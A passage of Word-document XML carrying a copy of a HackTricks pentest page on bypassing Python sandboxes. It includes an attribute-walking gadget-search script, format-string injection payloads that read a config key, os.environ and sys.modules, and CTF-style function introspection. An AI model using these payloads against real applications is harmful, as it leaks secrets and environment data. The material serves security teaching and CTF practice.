      </w:r>
    </w:p>
    <w:p w14:paraId="131F3AC8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for new_element in dir(element):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301EC793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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB1FBB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   check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D0DCC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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6FBD0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   # WARNING: Calling random functions sometimes kills the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105736F4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   # Comment this part if you notice that behaviour!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE3E0B0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   if execute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2FCD07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       try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD96095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           if callable(getattr(element, new_element)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B0234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               check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59706912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       except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487BABC2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           pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79119C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5693B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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2FB4A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   pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F0D4B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491DADB1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# If in a dict, scan also each key, very important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D4907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if type(element) is dict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37075055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for new_element in element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1AEF6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   check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1E44B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285FCB51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7E07B37F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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DFD83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print("Checking from empty string...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64732D21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total = [""]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31974114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for i,element in enumerate(total):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A859EF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print(f"\rStatus: {i}/{len(total)}", end="")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8EEC1B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        cont = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0904B030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check_recursive(element, cont, "", str(element), f"Empty str {i}", True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7D5E4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40054500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print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534DB2E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print("Checking loaded subclasses...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C946CE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total = "".__class__.__base__.__subclasses__()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE3788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for i,element in enumerate(total):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59954F6C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print(f"\rStatus: {i}/{len(total)}", end="")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5014B52E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cont = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577827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check_recursive(element, cont, "", str(element), f"Subclass {i}", True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D530DB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BFED51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print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B001943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print("Checking from global functions...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD5FB33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total = [print, check_recursive]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512C7E3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for i,element in enumerate(total):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B530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print(f"\rStatus: {i}/{len(total)}", end="")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD7EF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cont = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FCF64B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check_recursive(element, cont, "", str(element), f"Global func {i}", False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D815AF0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A6BCD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print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77565D4E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print(SEARCH_FOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47465E44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719B23F4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67BF2BE5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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C03CB88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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A3E3FE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You can check the output of this script on this page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E5AF8" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="uppercase"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>URL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="text-base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https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EA4B1D0" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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Python Format String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F464A9C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If you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send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to python that is going to be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formatted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access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python internal information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can use the previous examples to access globals or builtins for example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A9188A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However, there is a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limitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can only use the symbols </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>.[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, so you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won't be able to execute arbitrary code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, just to read information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>If you know how to execute code through this vulnerability, please contact me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F461F" w14:textId="5CBA9CD9" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1BA86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lastRenderedPageBreak/>
        <w:t># Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED876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CONFIG = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570C27A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"KEY": "ASXFYFGK78989"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E19B8F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719A39B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7DA61EF0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class PeopleInfo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FDCEC7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def __init__(self, fname, lname):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF29037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self.fname = fname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53938BB6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self.lname = lname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63972A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2DAAFC21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def get_name_for_avatar(avatar_str, people_obj):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397379C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return avatar_str.format(people_obj = people_obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D294D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64662957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people = PeopleInfo('GEEKS', 'FORGEEKS')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CDB8D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258F8E1C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st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B9281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get_name_for_avatar(st, people_obj = people)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61401988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Note how you can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access attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a normal way with a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dot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>people_obj.__init__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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dict element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> with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parenthesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> without quotes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>__globals__[CONFIG]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732058DC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Also note that you can use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>.__dict__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enumerate elements of an object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFDE3B0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Some other interesting characteristics from format strings is the possibility of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executing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the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functions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Style w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>str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Style w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>repr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the indicated object by adding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>!s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Style w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>!r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Style w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>!a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> respectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914A2D7" w14:textId="329048C1" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7EC04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st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E65476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get_name_for_avatar(st, people_obj = people)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4042E1C6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Moreover, it's possible to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code new formatters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DC3787" w14:textId="1CC77E6B" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B24A2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class HAL9000(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC95EF4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def __format__(self, format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C731C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if (format == 'open-the-pod-bay-doors'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8C30E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   return "I'm afraid I can't do that."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338FA74F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return 'HAL 9000'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29125685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3F8DF778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lastRenderedPageBreak/>
        <w:t>'{:open-the-pod-bay-doors}'.format(HAL9000())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B978D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#I'm afraid I can't do that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1D7B7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More examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> about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format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string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> examples can be found in </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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https://pyformat.info/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="754D32A3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Check also the following page for gadgets that will r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ead sensitive information from Python internal objects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C8908" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="uppercase"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>PAGE</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="text-base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Python Internal Read Gadgets</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6941CE72" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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Sensitive Information Disclosure Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99E3C0" w14:textId="1E5BFC80" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C30BA6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{whoami.__class__.__dict__}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2C36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{whoami.__globals__[os].__dict__}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F6065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{whoami.__globals__[os].environ}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291E6F2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{whoami.__globals__[sys].path}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255AD1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{whoami.__globals__[sys].modules}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE9A75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05D85672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Access an element through several links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57790205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{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584F52E8" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Dissecting Python Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762C66FE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If you want to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learn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> about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python bytecode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in depth read this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awesome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> post about the topic: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="207820E0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In some CTFs you could be provided with the name of a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custom function where the flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> resides and you need to see the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internals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the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function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to extract it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B91FBEE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This is the function to inspect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7AA908" w14:textId="79402A23" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3945C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def get_flag(some_input):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F824F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var1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6746F853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var2="secretcode"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B16A03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var3=["some","array"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CB11C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if some_input == var2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863459A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return "THIS-IS-THE-FALG!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43721B42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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C858D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return "Nope"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC2C25" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07664A95" w14:textId="0E78C858" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47E003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lastRenderedPageBreak/>
        <w:t>dir() #General dir() to find what we have loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269C18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['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3274B8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dir(get_flag) #Get info tof the function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4896B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['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790887CA" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>globals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E39E1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Style w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>__globals__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>func_globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0F6359" w14:textId="0EB9A34D" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C633BC7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get_flag.func_globals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F9113E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get_flag.__globals__</w:t>
      </w:r>
    </w:p>
